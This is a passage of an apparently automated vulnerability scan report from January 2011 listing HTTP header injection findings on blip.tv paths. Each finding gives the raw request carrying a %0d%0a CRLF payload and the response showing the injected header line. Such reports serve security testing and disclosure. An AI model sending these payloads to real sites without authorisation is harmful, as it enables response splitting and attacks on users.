Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/f5faf
ad9111d4936
/hbgSgoqOawI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:46 GMT
X-Varnish: 1274884570
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f5faf
ad9111d4936/hbgSgoqOa
...[SNIP]...

2.215. http://blip.tv/play/hbgSgoqOawI [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbgSgoqOawI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 88d2a%0d%0a103103db6ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/88d2a%0d%0a103103db6ac HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/88d2a
103103db6ac

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:46 GMT
X-Varnish: 344229973
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/88d2a
103103db6ac">her
...[SNIP]...

2.216. http://blip.tv/play/hbgSgoqOawI.m4v/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbgSgoqOawI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4fd2e%0d%0a220762a834a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4fd2e%0d%0a220762a834a/hbgSgoqOawI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/4fd2e
220762a834a
/hbgSgoqOawI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 295
Date: Thu, 20 Jan 2011 00:38:46 GMT
X-Varnish: 1274884648
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/4fd2e
220762a834a/hbgSgoqOa
...[SNIP]...

2.217. http://blip.tv/play/hbgSgoqOawI.m4v/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbgSgoqOawI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 47bf5%0d%0af684f642c98 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/47bf5%0d%0af684f642c98/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/47bf5
f684f642c98
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:47 GMT
X-Varnish: 1025269940
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/47bf5
f684f642c98/">he
...[SNIP]...

2.218. http://blip.tv/play/hodpgpH4MwI [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hodpgpH4MwI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a214%0d%0af56409e4ca8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a214%0d%0af56409e4ca8/hodpgpH4MwI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/6a214
f56409e4ca8
/hodpgpH4MwI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:50 GMT
X-Varnish: 1248908985
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/6a214
f56409e4ca8/hodpgpH4M
...[SNIP]...

2.219. http://blip.tv/play/hodpgpH4MwI [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hodpgpH4MwI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8b662%0d%0a1fb4d628927 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/8b662%0d%0a1fb4d628927 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/8b662
1fb4d628927

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:50 GMT
X-Varnish: 1498220485
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/8b662
1fb4d628927">her
...[SNIP]...

2.220. http://blip.tv/play/hodpgpH4MwI.m4v/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hodpgpH4MwI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fda23%0d%0a38745f1aedb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fda23%0d%0a38745f1aedb/hodpgpH4MwI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/fda23
38745f1aedb
/hodpgpH4MwI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 295
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 344230771
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fda23
38745f1aedb/hodpgpH4M
...[SNIP]...

2.221. http://blip.tv/play/hodpgpH4MwI.m4v/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hodpgpH4MwI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8e377%0d%0aaa5e4d2ecf9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/8e377%0d%0aaa5e4d2ecf9/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/play/8e377
aa5e4d2ecf9
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 299
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 1498220580
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/8e377
aa5e4d2ecf9/">he
...[SNIP]...

2.222. http://blip.tv/play/hqkXgpzqKAI [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hqkXgpzqKAI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66c9d%0d%0a2e07d85723 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66c9d%0d%0a2e07d85723/hqkXgpzqKAI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/66c9d
2e07d85723
/hqkXgpzqKAI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 289
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1025268406
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/66c9d
2e07d85723/hqkXgpzqKA
...[SNIP]...

2.223. http://blip.tv/play/hqkXgpzqKAI [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hqkXgpzqKAI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 655a4%0d%0ac59653d05d0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/655a4%0d%0ac59653d05d0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/655a4
c59653d05d0

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1498218407
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/655a4
c59653d05d0">her
...[SNIP]...

2.224. http://blip.tv/play/hqkXgpzqKAI.m4v/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hqkXgpzqKAI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f678a%0d%0a360b9d92f78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f678a%0d%0a360b9d92f78/hqkXgpzqKAI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/f678a
360b9d92f78
/hqkXgpzqKAI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1025268476
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f678a
360b9d92f78/hqkXgpzqK
...[SNIP]...

2.225. http://blip.tv/play/hqkXgpzqKAI.m4v/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hqkXgpzqKAI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a85d0%0d%0add04bd7a515 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/a85d0%0d%0add04bd7a515/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/a85d0
dd04bd7a515
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1498218472
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/a85d0
dd04bd7a515/">he
...[SNIP]...

2.226. http://blip.tv/play/hsYBgpzsBwI [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hsYBgpzsBwI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a5687%0d%0a4177d1e0688 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a5687%0d%0a4177d1e0688/hsYBgpzsBwI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/a5687
4177d1e0688
/hsYBgpzsBwI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1324529026
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/a5687
4177d1e0688/hsYBgpzsB
...[SNIP]...

2.227. http://blip.tv/play/hsYBgpzsBwI [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hsYBgpzsBwI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2e593%0d%0afe762a762a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/2e593%0d%0afe762a762a0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/2e593
fe762a762a0

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:39 GMT
X-Varnish: 1324529081
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/2e593
fe762a762a0">her
...[SNIP]...

2.228. http://blip.tv/play/hsYBgpzsBwI.m4v/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hsYBgpzsBwI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1a9b0%0d%0ad91b20837c5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1a9b0%0d%0ad91b20837c5/hsYBgpzsBwI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/1a9b0
d91b20837c5
/hsYBgpzsBwI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1248906927
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/1a9b0
d91b20837c5/hsYBgpzsB
...[SNIP]...

2.229. http://blip.tv/play/hsYBgpzsBwI.m4v/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hsYBgpzsBwI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 55bb5%0d%0aa6e4a855b11 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/55bb5%0d%0aa6e4a855b11/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/55bb5
a6e4a855b11
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:39 GMT
X-Varnish: 344228803
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/55bb5
a6e4a855b11/">he
...[SNIP]...

2.230. http://blip.tv/players/embed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /players/embed/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ded4c%0d%0a9fb8644b8b9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ded4c%0d%0a9fb8644b8b9/embed/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ded4c
9fb8644b8b9
/embed/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:14 GMT
X-Varnish: 1274889385
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ded4c
9fb8644b8b9/embed/">h
...[SNIP]...

2.231. http://blip.tv/players/embed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /players/embed/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8f32c%0d%0a2affe04b905 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /players/8f32c%0d%0a2affe04b905/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/players/8f32c
2affe04b905
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:39:15 GMT
X-Varnish: 1248913063
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/players/8f32c
2affe04b905/"
...[SNIP]...

2.232. http://blip.tv/popular [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /popular

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e263b%0d%0a6c92da3739c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e263b%0d%0a6c92da3739c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e263b
6c92da3739c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 278
Date: Thu, 20 Jan 2011 00:38:54 GMT
X-Varnish: 1025271326
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e263b
6c92da3739c">here</a>
...[SNIP]...

2.233. http://blip.tv/posts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /posts/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c2fc7%0d%0aa64f9f8f909 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c2fc7%0d%0aa64f9f8f909/?bookmarked_by=hotepisodes&skin=json&callback=?&version=2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c2fc7
a64f9f8f909
/?bookmarked_by=hotepisodes&skin=json&callback=?&version=2
Content-Type: text/html; charset=iso-8859-1
Content-Length: 348
Date: Thu, 20 Jan 2011 00:39:15 GMT
X-Varnish: 2146053271
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c2fc7
a64f9f8f909/?bookmark
...[SNIP]...

2.234. http://blip.tv/posts/report_inappropriate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /posts/report_inappropriate

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c847b%0d%0a9db90af76ad was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c847b%0d%0a9db90af76ad/report_inappropriate HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c847b
9db90af76ad
/report_inappropriate
Content-Type: text/html; charset=iso-8859-1
Content-Length: 299
Date: Thu, 20 Jan 2011 00:39:11 GMT
X-Varnish: 1274888956
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c847b
9db90af76ad/report_in
...[SNIP]...

2.235. http://blip.tv/posts/report_inappropriate [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /posts/report_inappropriate

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7e782%0d%0adfaef70a8a1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /posts/7e782%0d%0adfaef70a8a1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/posts/7e782
dfaef70a8a1

Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:39:12 GMT
X-Varnish: 1274888999
Age: 0
Via: 1.1 varnish
Connection: close

